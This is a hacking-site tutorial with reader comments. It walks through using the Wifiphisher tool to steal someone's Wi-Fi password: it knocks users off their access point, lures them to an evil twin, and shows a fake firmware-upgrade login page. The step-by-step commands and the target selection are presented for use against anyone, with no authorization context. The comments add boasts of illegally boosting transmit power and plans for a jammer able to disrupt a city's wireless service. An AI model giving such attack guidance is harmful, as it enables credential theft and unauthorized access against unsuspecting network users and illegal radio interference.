Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher

• BY OCCUPYTHEWEB
•  07/22/2017 11:56 AM
• WI-FI HACKING

Welcome back, my tenderfoot hackers!

Do you need to get a Wi-Fi password but don't have the time to crack it? In previous tutorials, I have shown how to crack WEP, WPA2, and WPS, but some people have complained that cracking WPA2 takes too long and that not all access points have WPS enabled (even though quite a few do). To help out in these situations, I present to you an almost surefire way to get a Wi-Fi password without cracking—Wifiphisher.

Steps in the Wifiphisher Strategy

The idea here is to create an evil twin AP, then de-authenticate or DoS the user from their real AP. When they re-authenticate to your fake AP with the same SSID, they will see a legitimate-looking webpage that requests their password because of a "firmware upgrade." When they provide their password, you capture it and then allow them to use the evil twin as their AP, so they don't suspect a thing. Brilliant!

To sum up, Wifiphisher takes the following steps:

1. De-authenticate the user from their legitimate AP.
2. Allow the user to authenticate to your evil twin.
3. Offer a webpage to the user on a proxy that notifies them that a "firmware upgrade" has taken place, and that they need to authenticate again.
4. The Wi-Fi password is passed to the hacker and the user continues to the web oblivious to what just happened.

Similar scripts have been around for awhile, such as Airsnarf, but this new Wifiphisher script is more sophisticated. In addition, you could always do this all manually, but now we have a script that automates the entire process. Recently, another script named Fluxion has also gained popularity as an alternative to Wifiphisher. You can check out this great guide on Fluxion if Wifiphisher isn't working for you.

To do this hack, you will need Kali Linux and two network wireless adapters, one of which must be capable of packet injection. You can use the tried and true AWUS036NHA, or check out our guide on picking the best wireless network adapterfor Kali Linux.

Don't miss: How to Buy the Best Best Wireless Network Adapter for Wi-Fi Hacking in 2017

You may use others, but before you do, make certain that it is compatible with Aircrack-ng (packet injection capable). Please do NOT post questions on why it doesn't work until you check if your wireless adapter can do packet injection. Most cannot.

Make sure you get an adapter that works with Kali Linux - Check out out updated guide on buying one.Image by SADMIN/Null Byte

Now let's take a look at Wifiphisher.

Step 1Download Wifiphisher

To begin, fire up Kali and open a terminal. Then download Wifiphisher from GitHuband unpack the code.

kali > tar -xvzf /root/wifiphisher-1.1.tar.gz

As you can see below, I have unpacked the Wifiphisher source code.

Alternatively, you can clone the code from GitHub by typing:

kali > git clone https://github/sophron/wifiphisher

Step 2Navigate to the Directory

Next, navigate to the directory that Wifiphisher created when it was unpacked. In my case, it is /wifiphisher-1.1.

kali > cd wifiphisher-.1.1

When listing the contents of that directory, you will see that the wifiphisher.py script is there.

kali > ls -l

Step 3Run the Script

You can run the Wifiphisher script by typing:

kali > python wifiphisher.py

Note that I preceded the script with the name of the interpreter, python.

The first time you run the script, it will likely tell you that "hostapd" is not found and will prompt you to install it. Install by typing "y" for yes. It will then proceed to install hostapd.

When it has completed, once again, execute the Wifiphisher script.

kali > python wifiphisher.py

This time, it will start the web server on port 8080 and 443, then go about and discover the available Wi-Fi networks.

When it has completed, it will list all the Wi-Fi networks it has discovered. Notice at the bottom of my example that it has discovered the network "wonderhowto." That is the network we will be attacking.

Step 4Send Your Attack & Get the Password

Go ahead and hit Ctrl + C on your keyboard and you will be prompted for the number of the AP that you would like to attack. In my case, it is 12.

When you hit Enter, Wifiphisher will display a screen like the one below that indicates the interface being used and the SSID of the AP being attacked and cloned.

The target user has been de-authenticated from their AP. When they re-authenticate, they will directed to the the cloned evil twin access point.

When they do, the proxy on the web server will catch their request and serve up an authentic-looking message that a firmware upgrade has taken place on their router and they must re-authenticate.

Notice that I have put in my password, nullbyte, and hit Submit.

When the user enters their password, it will be passed to you through the Wifiphisher open terminal, as seen below. The user will be passed through to the web through your system and out to the Internet, never suspecting anything awry has happened.

Get started hacking on our Kali Linux build.Image by SADMIN/Null Byte

If you're looking for a cheap, handy platform to get started working with wifipfisher, check out our Kali Linux Raspberry Pi build using the $35 Raspberry Pi.

Get Started Hacking Today: Set Up a Headless Raspberry Pi Hacking Platform Running Kali Linux

Now, my tenderfoot hackers, no Wi-Fi password is safe! Keep coming back as explore more of the world's most valuable skill set—hacking!

Related

• HOW TOiOS 6 Broke Your Wi-Fi? Here's How to Fix Connection Problems on Your iPhone or iPad

• HOW TONull Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky

• HOW TOThis Widget Lets You Open Wi-Fi Settings Faster, Share Passwords & More on Your iPhone

• HOW TOTurn on Google Pixel's Wi-Fi Assistant to Get Secure Access on Open Networks

• HOW TOEasily See Passwords for Wi-Fi Networks You've Connected Your Android Device To

• HOW TO HACK WI-FISelecting a Good Wi-Fi Hacking Strategy

• HOW TOHack WiFi Passwords for Free Wireless Internet on Your PS3

• HOW TOSee Passwords for Wi-Fi Networks You've Connected Your Android Device To

• HOW TOInstantly Share Wi-Fi Passwords from Your iPhone to Other iOS 11 Devices Nearby

• HOW TOEasily Share Your Complicated Wi-Fi Password Using Your Nexus 5

• HOW TO HACK WI-FIGetting Started with the Aircrack-Ng Suite of Wi-Fi Hacking Tools

• HOW TORecover a Lost WiFi Password from Any Device

• ANDROID BASICSHow to Connect to a Wi-Fi Network

• HOW TOFind & Share Local Wi-Fi Passwords for Free Internet Everywhere You Go

• NEWSProject Zero Finds iPhone & Android Open to Bugs in Broadcom's Wi-Fi Chips

• HOW TOSee Who's Using Your Wi-Fi & Boot Them Off with Your Android

• HOW TO HACK WI-FICracking WPA2-PSK Passwords Using Aircrack-Ng

• HOW TO HACK WI-FIChoosing a Wireless Adapter for Hacking

• HOW TOFind Saved WiFi Passwords in Windows

• HOW TOSave Battery Power by Pairing Wi-Fi Connections with Cell Tower Signals on Your Galaxy Note 3

• HOW TOGet the Strongest Wi-Fi Connection on Your Android Every Time

• HOW TO HACK WI-FICracking WEP Passwords with Aircrack-Ng

• HOW TOFix the Wi-Fi Roaming Bug on Your Samsung Galaxy S3

• HOW TOCrack Wi-Fi Passwords with Your Android Phone and Get Free Internet!

• HOW TOFix Wi-Fi Performance Issues in iOS 8 & Yosemite

• HOW TOMake Your Android Automatically Switch to the Strongest WiFi Network

• HOW TOThis App Saves Battery Life by Toggling Data Off When You're on Wi-Fi

• HOW TOCrack Wi-Fi Passwords—For Beginners!

• WIFI PRANKUse the iOS Exploit to Keep iPhone Users Off the Internet

• HOW TO HACK WI-FICracking WPA2-PSK Passwords with Cowpatty

• NEWSMIT Tech Protects Your WiFi Without Passwords

• HOW TO HACK WI-FIGetting Started with Terms & Technologies

• HOW TOShare Your Windows 8 PC's Internet with a Phone or Tablet by Turning It into a Wi-Fi Hotspot

• NEWSPSP2 (Next Generation Portable) or NGP

• HOW TOGet Free Wi-Fi from Hotels & More

• HOW TOWatch American Netflix from Other Regions on Your iOS Device

• HOW TOAuto-Toggle Your Android Device's Wi-Fi On and Off When Near or Away from a Hotspot

147 Comments

1

JEREMIAH PAYNE2 YEARS AGO

Hmmm interesting. I will try this when I get out of class. Maybe even be useful to have supported as an add on in my script I am working on.

2

PHOENIX7502 YEARS AGO

Interesting.

-Phoenix750

1

EVON TRETIKOFF3 WEEKS AGO

Why don't you shut down the wifi then name your device the ssid of the wifi let them sign in and when it's done direct them to the true ssid and you get the username and password and might as well add your self on there list thing

3

ALPHA CODE2 YEARS AGO - EDITED 2 YEARS AGO

great trick

but the problem is that the evil twin doesn't have the same BSSID as the original so you can see two APs with same eSSID and devices won't connect automatically...

so if the script could be edited for that it would be perfect

5

TRIPHAT2 YEARS AGO

You have to make sure the rogue AP's signal is stronger than the legit one. So you have to be close, or use a powerful antenna. Once you deauth your target pc, it will try to reconnect and will pick the strongest signal (yours).

3

OCCUPYTHEWEB2 YEARS AGO

Excellent point, TripHat. Check out the tutorials on increasing TX power here on Null Byte. Our trusty Alfa AWUSH can be amped up to 4x the legal limit.

2

PHOENIX7502 YEARS AGO - EDITED 2 YEARS AGO

A side note about the WiFi scrambler I am going to build in my Electricity/Electronics for Hackers series: My scrambler will be able to send out signals that reach 8 Watt, which is roughly 10-30 times higher than the legal limit. I haven't tested my design actually, because I'm afraid of legal consequences.

-Phoenix750

1

TRIPHAT2 YEARS AGO

Very interesting... if that will fit in my poor hardware knowledge, I'd be glad to test it. Also, to find out your real position, someone would have to triangulate the signal... that is not so easy if you're just running a test.

8

PHOENIX7502 YEARS AGO

With a well placed antenna, this jammer is capable of putting a small town without wifi. With even more power and a higher spot, this jammer may be capable of scrambling any wireless communication in an entire city like Chicago. Yes, an entire city!

The reason I am careful when working with the electromagnetic spectrum is because of something that happened to my dad when he was in his 20's. My dad was and still is, just like me, a passionated hardware hacker. One of the earliest things he did was build a radio transmitter for his town. This transmitter had the power of 100-200 Watt, and was placed on a high hill. My dad was successful in broadcasting his radio programs to our town (he was a hobby DJ back then), but it did have it's consequences. First of all, he never got the permission to broadcast on that wattage and on that frequency (which was 100.2 MHz, in case anyone is wondering), But he also caused disturbances at the airport of Amsterdam with his radio transmitter. Yes, the airport of Amsterdam, and we live near Brussels!

The reason this happened is because some of his radio waves reached Amsterdam, but not at the frequency he broadcasted at. These waves were just simple pulses that occurred every minute or so. But by crazy coincidence, these waves were at the same frequency the Amsterdam airport was using for it's control towers, and thus it caused disturbances in the communications of the pilots and the airport.